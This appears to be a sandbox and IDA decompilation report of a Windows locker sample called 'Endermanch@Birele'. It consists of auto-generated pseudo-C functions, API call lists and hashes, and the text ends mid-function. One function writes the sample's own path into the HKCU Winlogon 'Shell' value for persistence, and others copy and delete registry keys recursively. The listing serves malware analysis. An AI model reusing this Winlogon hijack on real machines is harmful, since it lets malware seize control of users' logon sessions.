                                                                                                                                                  			E00416CD4(void* __ebx, void* __esi, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                  
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(_t45);
                                                                                                                                                  				_push(0x416d6b);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t45;
                                                                                                                                                  				 *0x419b10 = E004150EC(1);
                                                                                                                                                  				E0041518C( *0x419b10, 0x80000001);
                                                                                                                                                  				E004152D0( *0x419b10, 0x419b10, 1, "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", __esi); // executed
                                                                                                                                                  				E00406040(0,  &_v12);
                                                                                                                                                  				E00403BA4( &_v8, E00403E38(_v12));
                                                                                                                                                  				E0041566C( *0x419b10, _v8, 0x416dc0);
                                                                                                                                                  				E0041515C( *0x419b10);
                                                                                                                                                  				E00402EF8( *0x419b10);
                                                                                                                                                  				_pop(_t40);
                                                                                                                                                  				 *[fs:eax] = _t40;
                                                                                                                                                  				_push(E00416D72);
                                                                                                                                                  				return E004039D0( &_v12, 2);
                                                                                                                                                  			}







                                                                                                                                                  0x00416cd7
                                                                                                                                                  0x00416cd9
                                                                                                                                                  0x00416ce3
                                                                                                                                                  0x00416ce4
                                                                                                                                                  0x00416ce9
                                                                                                                                                  0x00416cec
                                                                                                                                                  0x00416cfb
                                                                                                                                                  0x00416d04
                                                                                                                                                  0x00416d12
                                                                                                                                                  0x00416d1c
                                                                                                                                                  0x00416d2e
                                                                                                                                                  0x00416d3d
                                                                                                                                                  0x00416d44
                                                                                                                                                  0x00416d4b
                                                                                                                                                  0x00416d52
                                                                                                                                                  0x00416d55
                                                                                                                                                  0x00416d58
                                                                                                                                                  0x00416d6a

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$FileModuleNameOpen
                                                                                                                                                  • String ID: Shell$\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$dPA
                                                                                                                                                  • API String ID: 3807207300-2870672713
                                                                                                                                                  • Opcode ID: 15aa72c9726bfa40507e8934dbca8e692a976af2498af1528ce6daeb54ffe17e
                                                                                                                                                  • Instruction ID: c0636251eb1413816d7780e85c4fd4ec95d181644a148eecd2aa2730e43b21ed
                                                                                                                                                  • Opcode Fuzzy Hash: 15aa72c9726bfa40507e8934dbca8e692a976af2498af1528ce6daeb54ffe17e
                                                                                                                                                  • Instruction Fuzzy Hash: AE018030700504ABD700EF69D892BCD77E8EB8A308F61447AF4009B395DA79AD45878D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E004155F4(void* __eax, char* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                  				long _t14;
                                                                                                                                                  				signed int _t18;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				char* _t27;
                                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t27 = __ecx;
                                                                                                                                                  				_t26 = __eax;
                                                                                                                                                  				E004028F0(__ecx, 8);
                                                                                                                                                  				_t1 = _t27 + 4; // 0x415658
                                                                                                                                                  				_t14 = RegQueryValueExA( *(_t26 + 4), E00403E38(__edx), 0, _t28 + 8, 0, _t1); // executed
                                                                                                                                                  				 *_t27 = E004150C4( *_t28);
                                                                                                                                                  				return _t18 & 0xffffff00 | _t14 == 0x00000000;
                                                                                                                                                  			}








                                                                                                                                                  0x004155f8
                                                                                                                                                  0x004155f9
                                                                                                                                                  0x004155fd
                                                                                                                                                  0x00415608
                                                                                                                                                  0x0041560d
                                                                                                                                                  0x00415626
                                                                                                                                                  0x00415638
                                                                                                                                                  0x00415642

                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,XVA,?,?,?,?,?,00415658), ref: 00415626
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID: XVA
                                                                                                                                                  • API String ID: 3660427363-1892953550
                                                                                                                                                  • Opcode ID: bdad61842de96a8ecfa6f7134ed25dccd154f6d51978f6cc7bc1d28d143b7bb5
                                                                                                                                                  • Instruction ID: 0be95d8bbee23d3a5970da2aada55c85b1e09da36afbaebcbe77afcb5e364633
                                                                                                                                                  • Opcode Fuzzy Hash: bdad61842de96a8ecfa6f7134ed25dccd154f6d51978f6cc7bc1d28d143b7bb5
                                                                                                                                                  • Instruction Fuzzy Hash: 3DF0A07330A2046BE710EAAE9C41FAB6BDCDB88355F00813EF50CC7281CA25CC0883B4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                  			E00415AC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                  				void* _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                  				char _v72;
                                                                                                                                                  				char _v76;
                                                                                                                                                  				char _v80;
                                                                                                                                                  				char _v84;
                                                                                                                                                  				void* _t86;
                                                                                                                                                  				long _t95;
                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                  				void* _t124;
                                                                                                                                                  				long _t134;
                                                                                                                                                  				void* _t135;
                                                                                                                                                  				intOrPtr _t148;
                                                                                                                                                  				intOrPtr _t160;
                                                                                                                                                  				void* _t161;
                                                                                                                                                  				void* _t162;
                                                                                                                                                  				void* _t164;
                                                                                                                                                  				void* _t165;
                                                                                                                                                  				intOrPtr _t166;
                                                                                                                                                  
                                                                                                                                                  				_t162 = __esi;
                                                                                                                                                  				_t161 = __edi;
                                                                                                                                                  				_t135 = __ebx;
                                                                                                                                                  				_t164 = _t165;
                                                                                                                                                  				_t166 = _t165 + 0xffffffb0;
                                                                                                                                                  				_v84 = 0;
                                                                                                                                                  				_v80 = 0;
                                                                                                                                                  				_v76 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_v12 = __edx;
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_push(_t164);
                                                                                                                                                  				_push(0x415d01);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t166;
                                                                                                                                                  				_v28 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                                                                  				E004151F0( *((intOrPtr*)(_a4 - 4)), _v8);
                                                                                                                                                  				_push(_t164);
                                                                                                                                                  				_push(0x415cd7);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t166;
                                                                                                                                                  				if(E0041558C( *((intOrPtr*)(_a4 - 4)),  &_v72, __eflags) == 0) {
                                                                                                                                                  					L8:
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					_pop(_t148);
                                                                                                                                                  					 *[fs:eax] = _t148;
                                                                                                                                                  					_push(E00415CDE);
                                                                                                                                                  					return E004151F0( *((intOrPtr*)(_a4 - 4)), _v28);
                                                                                                                                                  				} else {
                                                                                                                                                  					E00403A9C( &_v24, _v68 + 1, 0);
                                                                                                                                                  					_t86 = _v72 - 1;
                                                                                                                                                  					if(_t86 >= 0) {
                                                                                                                                                  						_v44 = _t86 + 1;
                                                                                                                                                  						_v20 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_v16 = _v68 + 1;
                                                                                                                                                  							_t95 = RegEnumKeyExA(_v8, _v20, E00403E38(_v24),  &_v16, 0, 0, 0, 0); // executed
                                                                                                                                                  							if(_t95 != 0) {
                                                                                                                                                  								goto L7;
                                                                                                                                                  							} else {
                                                                                                                                                  								E00403BA4( &_v76, E00403E38(_v24));
                                                                                                                                                  								_t102 = E00415774( *((intOrPtr*)(_a4 - 4)), _t135, _v76, _t162); // executed
                                                                                                                                                  								_v36 = _t102;
                                                                                                                                                  								_t172 = _v36;
                                                                                                                                                  								if(_v36 == 0) {
                                                                                                                                                  									goto L7;
                                                                                                                                                  								} else {
                                                                                                                                                  									_push(_t164);
                                                                                                                                                  									_push(0x415ca8);
                                                                                                                                                  									_push( *[fs:eax]);
                                                                                                                                                  									 *[fs:eax] = _t166;
                                                                                                                                                  									_v32 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 4));
                                                                                                                                                  									E004151F0( *((intOrPtr*)(_a4 - 4)), _v12);
                                                                                                                                                  									_push(_t164);
                                                                                                                                                  									_push(0x415c8a);
                                                                                                                                                  									_push( *[fs:eax]);
                                                                                                                                                  									 *[fs:eax] = _t166;
                                                                                                                                                  									E00403BA4( &_v80, E00403E38(_v24));
                                                                                                                                                  									E004151F4( *((intOrPtr*)(_a4 - 4)), _t135, _v80, _t161, _t162); // executed
                                                                                                                                                  									E00403BA4( &_v84, E00403E38(_v24));
                                                                                                                                                  									_t124 = E00415774( *((intOrPtr*)(_a4 - 4)), _t135, _v84, _t162); // executed
                                                                                                                                                  									_v40 = _t124;
                                                                                                                                                  									_push(_t164);
                                                                                                                                                  									_push(0x415c67);
                                                                                                                                                  									_push( *[fs:eax]);
                                                                                                                                                  									 *[fs:eax] = _t166;
                                                                                                                                                  									E00415998(_v36, _t135, _v40, _t161, _t162, _t172, _a4); // executed
                                                                                                                                                  									E00415AC0(_v36, _t135, _v40, _t161, _t162, _t172, _a4); // executed
                                                                                                                                                  									_pop(_t160);
                                                                                                                                                  									 *[fs:eax] = _t160;
                                                                                                                                                  									_push(E00415C6E);
                                                                                                                                                  									_t134 = RegCloseKey(_v40); // executed
                                                                                                                                                  									return _t134;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L10;
                                                                                                                                                  							L7:
                                                                                                                                                  							_v20 = _v20 + 1;
                                                                                                                                                  							_t62 =  &_v44;
                                                                                                                                                  							 *_t62 = _v44 - 1;
                                                                                                                                                  							__eflags =  *_t62;
                                                                                                                                                  						} while ( *_t62 != 0);
                                                                                                                                                  					}
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				L10:
                                                                                                                                                  			}































                                                                                                                                                  0x00415ac0
                                                                                                                                                  0x00415ac0
                                                                                                                                                  0x00415ac0
                                                                                                                                                  0x00415ac1
                                                                                                                                                  0x00415ac3
                                                                                                                                                  0x00415ac8
                                                                                                                                                  0x00415acb
                                                                                                                                                  0x00415ace
                                                                                                                                                  0x00415ad1
                                                                                                                                                  0x00415ad4
                                                                                                                                                  0x00415ad7
                                                                                                                                                  0x00415adc
                                                                                                                                                  0x00415add
                                                                                                                                                  0x00415ae2
                                                                                                                                                  0x00415ae5
                                                                                                                                                  0x00415af1
                                                                                                                                                  0x00415afd
                                                                                                                                                  0x00415b04
                                                                                                                                                  0x00415b05
                                                                                                                                                  0x00415b0a
                                                                                                                                                  0x00415b0d
                                                                                                                                                  0x00415b20
                                                                                                                                                  0x00415cbb
                                                                                                                                                  0x00415cbb
                                                                                                                                                  0x00415cbd
                                                                                                                                                  0x00415cc0
                                                                                                                                                  0x00415cc3
                                                                                                                                                  0x00415cd6
                                                                                                                                                  0x00415b26
                                                                                                                                                  0x00415b2f
                                                                                                                                                  0x00415b37
                                                                                                                                                  0x00415b3a
                                                                                                                                                  0x00415b41
                                                                                                                                                  0x00415b44
                                                                                                                                                  0x00415b4b
                                                                                                                                                  0x00415b4f
                                                                                                                                                  0x00415b6f
                                                                                                                                                  0x00415b76
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415b7c
                                                                                                                                                  0x00415b89
                                                                                                                                                  0x00415b97
                                                                                                                                                  0x00415b9c
                                                                                                                                                  0x00415b9f
                                                                                                                                                  0x00415ba3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415ba9
                                                                                                                                                  0x00415bab
                                                                                                                                                  0x00415bac
                                                                                                                                                  0x00415bb1
                                                                                                                                                  0x00415bb4
                                                                                                                                                  0x00415bc0
                                                                                                                                                  0x00415bcc
                                                                                                                                                  0x00415bd3
                                                                                                                                                  0x00415bd4
                                                                                                                                                  0x00415bd9
                                                                                                                                                  0x00415bdc
                                                                                                                                                  0x00415bec
                                                                                                                                                  0x00415bfa
                                                                                                                                                  0x00415c0c
                                                                                                                                                  0x00415c1a
                                                                                                                                                  0x00415c1f
                                                                                                                                                  0x00415c24
                                                                                                                                                  0x00415c25
                                                                                                                                                  0x00415c2a
                                                                                                                                                  0x00415c2d
                                                                                                                                                  0x00415c3a
                                                                                                                                                  0x00415c4a
                                                                                                                                                  0x00415c52
                                                                                                                                                  0x00415c55
                                                                                                                                                  0x00415c58
                                                                                                                                                  0x00415c61
                                                                                                                                                  0x00415c66
                                                                                                                                                  0x00415c66
                                                                                                                                                  0x00415ba3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415caf
                                                                                                                                                  0x00415caf
                                                                                                                                                  0x00415cb2
                                                                                                                                                  0x00415cb2
                                                                                                                                                  0x00415cb2
                                                                                                                                                  0x00415cb2
                                                                                                                                                  0x00415b4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00415b3a
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0041558C: RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,0041548A,00000000), ref: 004155C3
                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415CD7,?,00000000,00415D01), ref: 00415B6F
                                                                                                                                                    • Part of subcall function 00415774: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,004157FA), ref: 004157DF
                                                                                                                                                    • Part of subcall function 004151F4: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041526B
                                                                                                                                                    • Part of subcall function 004151F4: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004152C0), ref: 0041527F
                                                                                                                                                    • Part of subcall function 00415998: RegEnumValueA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00415A8A,?,00000000,00415AAF), ref: 00415A3D
                                                                                                                                                    • Part of subcall function 00415AC0: RegCloseKey.ADVAPI32(?,00415C6E,00000000,00415C8A,?,00000000,00415CA8,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseEnum$CreateInfoOpenQueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 957127650-0
                                                                                                                                                  • Opcode ID: 17ab5dfaac206068ac71786cf3f6c4fbbebf4ef4bbcca21094b90d8354c13603
                                                                                                                                                  • Instruction ID: 62ce5320b14838b23070538cb02f8894d0d0bf477f9eea7edafbdfa9764f96ce
                                                                                                                                                  • Opcode Fuzzy Hash: 17ab5dfaac206068ac71786cf3f6c4fbbebf4ef4bbcca21094b90d8354c13603
                                                                                                                                                  • Instruction Fuzzy Hash: F851C935A00A08DFCB01DF99C985ADEBBF9EB48714F518566F804E7351D738AE41CB98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00401978: RtlInitializeCriticalSection.NTDLL(004195C4), ref: 0040198E
                                                                                                                                                    • Part of subcall function 00401978: RtlEnterCriticalSection.NTDLL(004195C4), ref: 004019A1
                                                                                                                                                    • Part of subcall function 00401978: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401A2E), ref: 004019CB
                                                                                                                                                    • Part of subcall function 00401978: RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401A28
                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(004195C4), ref: 004020AF
                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 004021DA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2227675388-0
                                                                                                                                                  • Opcode ID: 3435c0592be33671a75e925e408d813020efbefca6112705338a3c4ab091e6d4
                                                                                                                                                  • Instruction ID: 6444be712089267c6e5c34b626e2a441286cb6b47e6f2a00395febc31b3f7a00
                                                                                                                                                  • Opcode Fuzzy Hash: 3435c0592be33671a75e925e408d813020efbefca6112705338a3c4ab091e6d4
                                                                                                                                                  • Instruction Fuzzy Hash: 4E4103B2A003009FDB15CF29DDA56AAB7A1EB94318B14817FD505EB3E1D7789D41CB1C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E004153F0(intOrPtr __eax, void* __ebx, void* __edx) {
                                                                                                                                                  				intOrPtr _v4;
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				char _v9;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				intOrPtr _v13;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				char _v64;
                                                                                                                                                  				intOrPtr _v117;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				char* _t55;
                                                                                                                                                  				long _t58;
                                                                                                                                                  				long _t73;
                                                                                                                                                  				long _t82;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				int _t94;
                                                                                                                                                  				intOrPtr _t107;
                                                                                                                                                  				intOrPtr _t111;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t120;
                                                                                                                                                  				intOrPtr _t121;
                                                                                                                                                  
                                                                                                                                                  				_pop(_t120);
                                                                                                                                                  				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                                                                  				_v117 = _v117 + __edx;
                                                                                                                                                  				_t119 = _t120;
                                                                                                                                                  				_t121 = _t120 + 0xffffffc4;
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_v60 = 0;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_t91 = __edx;
                                                                                                                                                  				_v4 = __eax;
                                                                                                                                                  				_push(_t119);
                                                                                                                                                  				_push(0x41555d);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t121;
                                                                                                                                                  				E00403A44( &_v16, __edx);
                                                                                                                                                  				_v9 = E00415080(_v16);
                                                                                                                                                  				if(_v9 == 0) {
                                                                                                                                                  					E00403ED8( &_v20, 1, 1);
                                                                                                                                                  				}
                                                                                                                                                  				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                  				_t53 = E00415774(_v8, _t91, _t91, _t117); // executed
                                                                                                                                                  				_v32 = _t53;
                                                                                                                                                  				_t124 = _v32;
                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                  					_t55 = E00403E38(_v20);
                                                                                                                                                  					_t58 = RegDeleteKeyA(E004151DC(_v8, _v13), _t55); // executed
                                                                                                                                                  					_t58 = 0;
                                                                                                                                                  					_pop(_t107);
                                                                                                                                                  					 *[fs:eax] = _t107;
                                                                                                                                                  					_push(E00415564);
                                                                                                                                                  					E004039AC( &_v64);
                                                                                                                                                  					return E004039D0( &_v24, 2);
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t119);
                                                                                                                                                  					_push(0x415514);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t121;
                                                                                                                                                  					E004151F0(_v8, _v32);
                                                                                                                                                  					if(E0041558C(_v8,  &_v60, _t124) != 0) {
                                                                                                                                                  						E00403A9C( &_v24, _v56 + 1, 0);
                                                                                                                                                  						_t94 = _v60 - 1;
                                                                                                                                                  						if(_t94 >= 0) {
                                                                                                                                                  							do {
                                                                                                                                                  								_v12 = _v56 + 1;
                                                                                                                                                  								_t82 = RegEnumKeyExA(_v32, _t94, E00403E38(_v24),  &_v12, 0, 0, 0, 0); // executed
                                                                                                                                                  								if(_t82 == 0) {
                                                                                                                                                  									E00403BA4( &_v64, E00403E38(_v24));
                                                                                                                                                  									L1(); // executed
                                                                                                                                                  								}
                                                                                                                                                  								_t94 = _t94 - 1;
                                                                                                                                                  							} while (_t94 != 0xffffffff);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_pop(_t111);
                                                                                                                                                  					 *[fs:eax] = _t111;
                                                                                                                                                  					_push(0x41551b);
                                                                                                                                                  					E004151F0(_v8, _v28);
                                                                                                                                                  					_t73 = RegCloseKey(_v32); // executed
                                                                                                                                                  					return _t73;
                                                                                                                                                  				}
                                                                                                                                                  			}






























                                                                                                                                                  0x004153f0
                                                                                                                                                  0x004153f1
                                                                                                                                                  0x004153f3
                                                                                                                                                  0x004153f5
                                                                                                                                                  0x004153f7
                                                                                                                                                  0x004153fa
                                                                                                                                                  0x004153fd
                                                                                                                                                  0x00415400
                                                                                                                                                  0x00415403
                                                                                                                                                  0x00415406
                                                                                                                                                  0x00415408
                                                                                                                                                  0x0041540d
                                                                                                                                                  0x0041540e
                                                                                                                                                  0x00415413
                                                                                                                                                  0x00415416
                                                                                                                                                  0x0041541e
                                                                                                                                                  0x0041542b
                                                                                                                                                  0x00415432
                                                                                                                                                  0x00415441
                                                                                                                                                  0x00415441
                                                                                                                                                  0x0041544c
                                                                                                                                                  0x00415454
                                                                                                                                                  0x00415459
                                                                                                                                                  0x0041545c
                                                                                                                                                  0x00415460
                                                                                                                                                  0x0041551e
                                                                                                                                                  0x00415530
                                                                                                                                                  0x0041553a
                                                                                                                                                  0x0041553c
                                                                                                                                                  0x0041553f
                                                                                                                                                  0x00415542
                                                                                                                                                  0x0041554a
                                                                                                                                                  0x0041555c
                                                                                                                                                  0x00415466
                                                                                                                                                  0x00415468
                                                                                                                                                  0x00415469
                                                                                                                                                  0x0041546e
                                                                                                                                                  0x00415471
                                                                                                                                                  0x0041547a
                                                                                                                                                  0x0041548c
                                                                                                                                                  0x00415497
                                                                                                                                                  0x0041549f
                                                                                                                                                  0x004154a3
                                                                                                                                                  0x004154a5
                                                                                                                                                  0x004154a9
                                                                                                                                                  0x004154c6
                                                                                                                                                  0x004154cd
                                                                                                                                                  0x004154dc
                                                                                                                                                  0x004154e7
                                                                                                                                                  0x004154e7
                                                                                                                                                  0x004154ec
                                                                                                                                                  0x004154ed
                                                                                                                                                  0x004154a5
                                                                                                                                                  0x004154a3
                                                                                                                                                  0x004154f4
                                                                                                                                                  0x004154f7
                                                                                                                                                  0x004154fa
                                                                                                                                                  0x00415505
                                                                                                                                                  0x0041550e
                                                                                                                                                  0x00415513
                                                                                                                                                  0x00415513

                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseEnum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2818636725-0
                                                                                                                                                  • Opcode ID: 30c0c92bbd527816d49e7bbb4ac1790377772c14e99304b7a86efbab6acd3d06
                                                                                                                                                  • Instruction ID: f9fab664c970e0139ba174afad949d8553416a2effaa568708381859235bd353
                                                                                                                                                  • Opcode Fuzzy Hash: 30c0c92bbd527816d49e7bbb4ac1790377772c14e99304b7a86efbab6acd3d06
                                                                                                                                                  • Instruction Fuzzy Hash: F7314170E04648EFDB01DFA9C882BEEBBB5EB48314F50456AF411F7391D6389E418B58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                  			E004152D0(void* __eax, void* __ebx, char __ecx, void* __edx, void* __esi) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				char _v6;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				char* _t40;
                                                                                                                                                  				signed int _t43;
                                                                                                                                                  				char* _t55;
                                                                                                                                                  				signed char _t63;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				void* _t78;
                                                                                                                                                  				void* _t81;
                                                                                                                                                  
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v5 = __ecx;
                                                                                                                                                  				_t78 = __eax;
                                                                                                                                                  				_push(_t81);
                                                                                                                                                  				_push(0x4153d5);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t81 + 0xfffffff0;
                                                                                                                                                  				E00403A44( &_v16, __edx);
                                                                                                                                                  				_t63 = E00415080(_v16);
                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                  					E00403ED8( &_v16, 1, 1);
                                                                                                                                                  				}
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				if(_v5 == 0 || _v16 == 0) {
                                                                                                                                                  					_t40 = E00403E38(_v16);
                                                                                                                                                  					_t43 = RegOpenKeyExA(E004151DC(_t78, _t63), _t40, 0,  *(_t78 + 0x18),  &_v12);
                                                                                                                                                  					_v6 = _t43 == 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t55 = E00403E38(_v16);
                                                                                                                                                  					_t43 = RegCreateKeyExA(E004151DC(_t78, _t63), _t55, 0, 0, 0,  *(_t78 + 0x18), 0,  &_v12,  &_v20); // executed
                                                                                                                                                  					_v6 = _t43 == 0;
                                                                                                                                                  				}
                                                                                                                                                  				if(_v6 != 0) {
                                                                                                                                                  					if(((_t43 & 0xffffff00 |  *((intOrPtr*)(_t78 + 4)) != 0x00000000) & _t63) != 0) {
                                                                                                                                                  						_push( *((intOrPtr*)(_t78 + 0x10)));
                                                                                                                                                  						_push(E004153F0);
                                                                                                                                                  						_push(_v16);
                                                                                                                                                  						E00403D08();
                                                                                                                                                  					}
                                                                                                                                                  					E004151B8(_t78, _v16, _v12);
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t72);
                                                                                                                                                  				 *[fs:eax] = _t72;
